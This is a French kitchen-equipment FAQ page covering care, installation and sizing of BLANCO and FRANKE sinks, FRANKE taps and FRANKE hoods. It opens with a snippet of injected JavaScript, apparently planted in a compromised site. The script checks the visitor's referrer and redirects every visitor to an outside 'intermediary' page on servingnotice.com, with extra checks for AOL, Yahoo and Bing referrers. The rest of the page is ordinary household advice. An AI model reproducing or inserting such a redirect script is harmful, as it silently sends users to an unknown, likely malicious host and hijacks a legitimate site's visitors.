var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/O7ul2v/intermediary.html?richubaidaninfo"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; Mon Espace Cuisine - Foire aux questions
Foire Aux Questions
Éviers BLANCO
Les éviers en inox peuvent-ils rouiller ?
Si l’évier est entretenu régulièrement et exposé aux contraintes ménagères habituelles, la réponse à cette question est clairement non. Cependant, les points suivants sont à observer lors de l’entretien de votre évier en inox :
Eliminez régulièrement les dépôts de saleté et de calcaire.
N’utilisez pas de nettoyant contenant du chlore (en général de l’hypochlorite de sodium) ou de l’acide chlorhydrique.
Si vous utilisez des tampons en laine d’acier pour le nettoyage, ces derniers doivent être en acier inoxydable.
Evitez l’action prolongée de liquides à forte teneur en sel de cuisine.
Evitez le contact direct prolongé avec des objets en fer qui rouillent (p. ex. poêles en fonte ou limaille de fer).
D'où viennent les taches à la surface de l'évier ?
En règle générale, ces taches sont des dépôts de calcaire qui apparaissent avec plus ou moins d’intensité en fonction de la dureté de l’eau du robinet (le service communal des eaux renseigne sur la dureté de l’eau). Ces dépôts de calcaire retiennent davantage les particules de saleté, faisant apparaître assez rapidement des taches inesthétiques. De même, de petites particules de fer et de rouille provenant du réseau de conduites d’eau, surtout dans les constructions neuves ou lors de travaux de maintenance sur les tuyauteries, peuvent donner l’impression de traces de rouille.
Comment éviter la formation de taches ?
Pour éviter ces taches, le plus simple est d’essuyer l’évier à sec après chaque utilisation. Pour les éliminer, vous pouvez utiliser n’importe quel produit d’entretien pour l’inox avec effet détartrant, disponible dans le commerce. Pour un entretien journalier optimal de l’évier, nous conseillons d’utiliser BLANCO POLISH et une éponge SPONTEX spéciale pour le nettoyage des surfaces en inox. La surface est ainsi nettoyée en profondeur et entretenue comme il se doit.
Pourquoi l'évier en inox neuf présente-t-il des rayures dès les premières semaines ?
Comment freiner l’apparition de ces rayures lors des premières semaines d’utilisation ? Nos éviers en inox brillant sont fabriqués avec tout le soin nécessaire, selon les techniques de fabrication et d’usinage les plus modernes. L’acier inoxydable utilisé à cet effet subit de sévères contrôles de qualité et garantit un niveau de qualité élevé et constant des éviers.
Toutefois, les propriétés de l’acier inoxydable 18/10 (rappelons que l’inox est un matériau tendre) excluent – d’après l’état actuel de la technique – une résistance absolue aux rayures. L’apparition de petites rayures n’est donc rien d’inhabituel. Seul un entretien régulier avec les produits conseillés BLANCO POLISH et une éponge SPONTEX pour surfaces en inox permet d’obtenir au bout de 2 à 4 semaines une surface satinée mate relativement insensible aux rayures et à la résistance illimitée.
Quelles sont les caractéristiques d'un évier en céramique ?
Les éviers en céramique de BLANCO sont fabriqués, eux aussi, dans une pure tradition artisanale à partir de matières premières naturelles. Chaque évier étant une pièce unique, il n’est donc pas possible d’éviter de légers écarts au niveau des dimensions et des coloris.
Quel est le degré de résistance d'un évier en céramique ?
Tous les éviers CERAMIQUE de BLANCO présentent, du fait d’un usinage de qualité, une surface dure et résistante qui se caractérise par une protection contre les rayures, une résistance aux coupures et une insensibilité aux chocs. Des objets exceptionnellement lourds et durs qui heurteraient la surface après une chute d’une hauteur correspondante, peuvent néanmoins occasionner des dommages.
Les éviers en céramique sont-ils faciles à entretenir ?
Les éviers CERAMIQUE de BLANCO sont très faciles d’entretien. La surface des éviers CERAMIQUE de BLANCO est particulièrement dure, lisse et à structure fermée. Ces propriétés empêchent la pénétration d’impuretés dans la matière et il suffit d’essuyer la surface à l’aide d’une éponge pour la nettoyer.
Que se passe-t-il lorsque des acides ou des lessives entrent en contact avec l'évier en céramique ?
Tous les éviers en céramique de BLANCO résistent aux acides et lessives disponibles dans le commerce.
Un évier en céramique résiste-t-il à la chaleur ?
Les éviers en céramique résistant parfaitement à la chaleur, ils ne craignent pas les températures habituelles pour la cuisson des aliments.
Les éviers en céramique sont-ils de qualité alimentaire ?
Tous les éviers CERAMIQUE de BLANCO ont été testés pour garantir leur hygiène et leur qualité alimentaire.
Les coloris peuvent-ils changer au fil du temps ?
Ni une exposition directe aux rayons du soleil ni une utilisation régulière de produits ménagers ne peut provoquer une modification des couleurs, puisque tous les coloris CERAMIQUE de BLANCO sont stables. L’évier peut donc être installé sous une fenêtre.

Si de légers dépôts de calcaire se forment avec le temps, il est possible que ces derniers entraînent une décoloration. Dans ce cas, l’utilisation de vinaigre de vin ou du produit anti-calcaire BLANCOANTIKALK permet de résoudre très efficacement le problème.

Qu'est-ce que PuraPlus ?
PuraPlus® est un revêtement spécial hydrofuge qui fait perler l’eau à la surface de l’évier. Cet effet perlé réduit l’adhérence des résidus (p. ex. calcaire) et facilite l’entretien journalier.
Comment les éviers en céramique sont-ils nettoyés ?
Pour l’entretien journalier, nous préconisons l’utilisation de nettoyants multi-usages vendus dans le commerce, d’éponges non abrasives ou de chiffons microfibre.

Bio-Boy, BLANCOANTIKALK et VIS sont des produits qui viennent efficacement à bout des taches les plus tenaces, p. ex. dépôts de calcaire ou traces métalliques. Dans ce cas, les éviers pourvus du revêtement Pura-Plus® doivent être traités avec Pura-Plus® Liquide de BLANCO, ce qui permet de rafraîchir l’effet perlé.

De quoi se compose le matériau SILGRANIT ?
Le SILGRANIT se compose à 80 % de granit naturel. Lié à une résine acrylique, à de la céramique et à des pigments colorants, le granit présente des propriétés inégalées.
Le matériau résiste-t-il à la chaleur ?
Oui, le SILGRANIT résiste à des températures jusqu’à 280 °C.
Quel est le degré de sensibilité du SILGRANIT® aux rayures ou à l'écaillage ?
Le SILGRANIT est dur comme de la pierre et résiste ainsi aux rayures et aux entailles. Il ne se fissure et ne s’écaille s’il est exposé à des chocs habituels dans la cuisine (casseroles ou chute d’objets, p. ex. des verres).
Le matériau est-il hygiénique sur le plan alimentaire ?
Oui, le SILGRANIT est certifié 100 % hygiène alimentaire.
Comment nettoie-t-on la surface ?
Le SILGRANIT est très facile d’entretien. Une éponge légèrement abrasive et un peu d’eau suffisent pour éliminer sans problème les taches et les traces d’utilisation. Pour venir à bout des taches les plus tenaces, vous pouvez utiliser un nettoyant vendu dans le commerce ou BLANCOACTIV.
Les éviers en SILGRANIT peuvent-ils se décolorer au fil du temps ?
Non. Le matériau est monobloc et teinté dans la masse. Aucune décoloration n’est perceptible en cas d’utilisation habituelle. Le coloris est stable même en cas d’exposition directe aux rayons du soleil.
D'où peuvent venir les traces et lignes sombres sur l'évier ?
En raison de la surface dure et extrêmement résistante du SILGRANIT, des objets métalliques (casseroles, poêles, etc.) peuvent laisser des traces sombres visibles sur les éviers de couleur claire.
Comment éliminer ces traces ?
Ces traces métalliques s’éliminent sans problème avec une éponge légèrement abrasive et un peu d’eau. Pour venir à bout des traces les plus tenaces, vous pouvez utiliser une poudre ou une crème à récurer vendue dans le commerce.
Le SILGRANIT peut-il se décolorer et se tacher ?
Non. Les décolorations et les taches sont dues aux dépôts de calcaire qui, après séchage, absorbent les liquides comme le café, le thé ou le vin rouge et donnent l’impression qu’il s’agit de taches de café ou de thé ou que la surface de l’évier se décolore.

Les dépôts de calcaire s’éliminent aisément avec une lessive vendue dans le commerce, de l’essence de vinaigre, d’autres produits détartrants similaires ou BLANCOACTIV et de l’eau chaude à 60 °C minimum. Après avoir laissé tremper 3 à 4 heures (ou encore mieux toute une nuit), il suffit de rincer l’évier, de le nettoyer avec une éponge et de l’essuyer à sec.

Le SILGRANIT est-il breveté et certifié ?
Oui, concernant le SILGRANIT actuel en exécution ‘PuraDur® II’, BLANCO est le détenteur exclusif de 7 brevets, ce qui fait du SILGRANIT un matériau unique au monde. En outre, 3 certificats de qualité neutre de l’Institut LGA de Nuremberg en confirment les exceptionnelles propriétés.
Éviers FRANKE
Comment puis-je connaître les dimensions pour la découpe de mon évier?
Pour chaque évier, vous pouvez retrouver les dimensions exactes dans la fiche produit ou dans le catalogue. Dans certains cas, un gabarit spécifique est fourni (voir fiches produits). Vous pouvez également retrouver, l’ensemble des gabarits de découpe sur notre site.
Quelle est la meilleure façon de nettoyer mon évier?
Franke dispose d’un assortiment de produits d’entretien pour entretenir votre évier quel que soit son matériau. Des produits peuvent être commandés directement sur notre site.
Comment savoir quels accessoires conviennent à mon évier?
Sur chaque page reprenant les détails d’un évier, vous trouverez un aperçu de choix des accessoires adaptés.
Comment puis-je percer le trou de la robinetterie dans un évier en Fragranit +?
Afin de percer le trou de la robinetterie, utilisez de préférence un marteau et un poinçon. Montez tout d’abord l’évier pour qu’il soit bien fixe dans l’ouverture d’encastrement. Ensuite, sélectionnez le point indiqué avec l’autocollant rond vert, et placez le poinçon au centre. Portez un coup sec sur le poinçon qui fera éclater la pastille. (Enlevez la pastille d’en haut vers le bas). Une fois la pastille cassée, il reste encore quelques débris tranchants qu’on enlève avec une grosse lime ronde ou le poinçon et le marteau.
Comment installer un évier Franke avec le système de montage Slimfix®?
Grâce au système de montage innovateur Slimfix®, l’évier est simplement déposé par le dessus dans la découpe prévue et fixé à l’aide des griffes intégrés sur les bords. Ces griffes à ressorts brevetés maintiennent solidement et simplement l’ancrage sur le plan de travail et ce, sans élément de fixation supplémentaire comme les systèmes habituels à pattes.
Il est indispensable cependant de respecter avec précision, la découpe du plan de travail (+/-2 mm de jeu). Pour l’étanchéité, l’évier doit être placé le plus près possible contre le plan de travail pour n’avoir besoin que d’une petite quantité de joint d’étanchéité.
En cas de nécessité, pour retirer l’évier de la découpe dans le plan, il est possible d’insérer entre le bord du plan de travail et les griffes à ressorts une pièce lisse très fine (par ex. plaques métalliques ou en bois laminé) ce qui fera lâcher la prise des griffes et permettra de soulever l’évier.
Comment entretenir un évier en acier inox-DEKOR® ou micro-DEKOR®?
Un évier à surface en inox-DEKOR® ou micro-DEKOR®, offre l’avantage de ne pas se rayer facilement. Il est possible en revanche que les points les plus élevées de la structure finissent par briller à cause du frottement permanent des ustensiles de cuisine sur sa surface.
Pour l’entretien de tous les jours, nous vous recommandons de sécher l’évier après chaque utilisation. Les gouttes d’eau en séchant, laissent effectivement des traces de calcaire blanches sur la surface.
Pour un entretien plus soutenu, aspergez d’abord l’évier à l’eau ou au vinaigre blanc, saupoudrez-le ensuite d’une poudre nettoyante et avec une éponge à récurer, nettoyez l’évier avec des mouvements réguliers et rectilignes dans le sens de la longueur de la surface. Dans le fond de l’évier, faites des mouvements circulaires. La surface mate de cette matière supporte très bien ce traitement. Rincer ensuite et sécher la surface.
A la place d’une poudre à récurer, vous pouvez utiliser également la lotion inox Franke. L’utilisation de ce produit développé spécialement par Franke pour l’acier inoxydable donnera un effet plus brillant.
Nous déconseillons vivement d’utiliser les “produits miracle”. Ces produits sont généralement composés de nombreuses matières agressives pour l’inox.
L’utilisation dans ou autour de l’évier de produits comme l’eau de javel, l’ammoniac, le sel, les produits anti-calcaire et toutes les autres matières contenant du chlore, de l’iode ou du bromure sont à déconseiller. Même si ces produits sont conservés dans un emballage fermé sous l’évier, ils libéreront des vapeurs agressives qui attaqueront autant la surface inférieure de l’évier que les charnières du meuble et l’évacuation du vidage. La couche de chrome sur l’acier inoxydable sera attaquée, éliminant les qualités passives spécifiques de la matière et provoquant l’oxydation.
Robinetterie FRANKE
Quelle peut être la cause de perte de débit d’un mitigeur?
Pour les nouvelles installations ou les installations rénovées, on néglige souvent de rincer l’installation avant de raccorder un robinet. Cette opération consiste simplement à faire une vidange directement derrière le robinet d’arrêt, tant pour l’eau chaude que pour l’eau froide, et de remplir au moins un seau avec le plus grand débit possible. Ceci permettra d’évacuer toutes les impuretés (laissées par les différentes opérations effectuées sur l’installation hors pression). Ce n’est qu’ensuite que le robinet pourra être raccordé et être mis en service.

Il est tout aussi recommandé de placer des robinets d’arrêt pourvus d’un filtre oblique intégré. Ce filtre capte les déchets flottants dans l’eau avant de se déposer sur les parties vitales du robinet et qui provoquent des bouchons ou des dommages.

La perte de débit est évidemment due à un bouchon au niveau du mousseur ou du clapet anti-retour. Le mousseur peut simplement se dévisser et être nettoyé sans aucun outil.

Si aucun des deux éléments n’est bouché, la perte de pression peut provenir du tuyau d’alimentation entre le robinet d’arrêt et le corps du robinet. Dans ce cas, il faut démonter le robinet, dévisser les tuyaux et en contrôler le passage.

Hottes FRANKE
Comment puis-je nettoyer ma hotte en inox?
Votre Franke Hotte en inox doit être nettoyée avec un chiffon humide et un détergent liquide neutre ou avec la crème Renov’Inox vendue dans les accessoires.
Quand changer mon filtre à charbon?
Ordinairement, un filtre à charbon doit être remplacé tous les 6 mois. Certaines hottes sont équipées d’un voyant de saturation des filtres, un voyant clignotera dans ce cas la pour vous indiquer qu’il est nécessaire de changer les filtres à charbon.
Comment puis-je nettoyer les filtres à graisse?
Tous les filtres à graisse Franke peuvent être nettoyés au lave-vaisselle
Comment choisir ma hotte adaptée à mes besoins?
Pour assurer un bon fonctionnement, la hotte doit pouvoir renouveler 10 fois par heure le volume d’air de la cuisine. Cette règle de calcul correspond à une utilisation normale. Dans le cas d’une cuisine ouverte sur une autre pièce, la puissance nécessaire devra tenir compte du volume total d’air à traiter. Une hotte installée en îlot central demandera une puissance supérieure. Les grilloirs et friteuses demandent des hottes de grande puissance.
Pour faire son choix il faut d’abord calculer le volume de la pièce. Ce chiffre peut être obtenu en multipliant longueur de la pièce x largeur x hauteur.
Donc, une cuisine qui est de 4 x 4 x 2,5 mètres a un volume de 40 m3.
On multiplie ensuite le volume de la pièce par 10 pour obtenir le débit optimale du flux d’air pour cette pièce.
Donc, une cuisine de 40 m3 x 10 = 400 – ce qui signifie qu’il faudrait un taux d’extraction de 400 m3 / h pour une ventilation efficace de la pièce.
Comment choisir la dimension de ma hotte en fonction de ma table de cuisson?
La largeur de la hotte et sa puissance doivent également être choisies en fonction du type de plan de cuisson installé. La largeur de la hotte ne devra en aucun cas être inférieure à celle de la plaque de cuisson.
Installation en évacuation ou en recyclage?
Les hottes Franke peuvent être installées indifféremment en évacuation extérieure (en les raccordant à un conduit) ou en recyclage à l’aide d’un filtre à charbon.
L’évacuation extérieure doit être privilégiée car elle apporte la solution la plus efficace.
En mode évacuation extérieur, l’air est aspiré puis filtré par un filtre métallique qui capture les graisses avant de renvoyer l’air vers l’extérieur par un conduit d’évacuation. Lorsque la hotte est en recyclage, l’air passe par les filtres à charbon qui fixent les odeurs, afin de pouvoir diffuser cet air purifié et sans odeur dans la pièce. L’air ambiant est dans les deux cas assaini pour votre plus grand confort.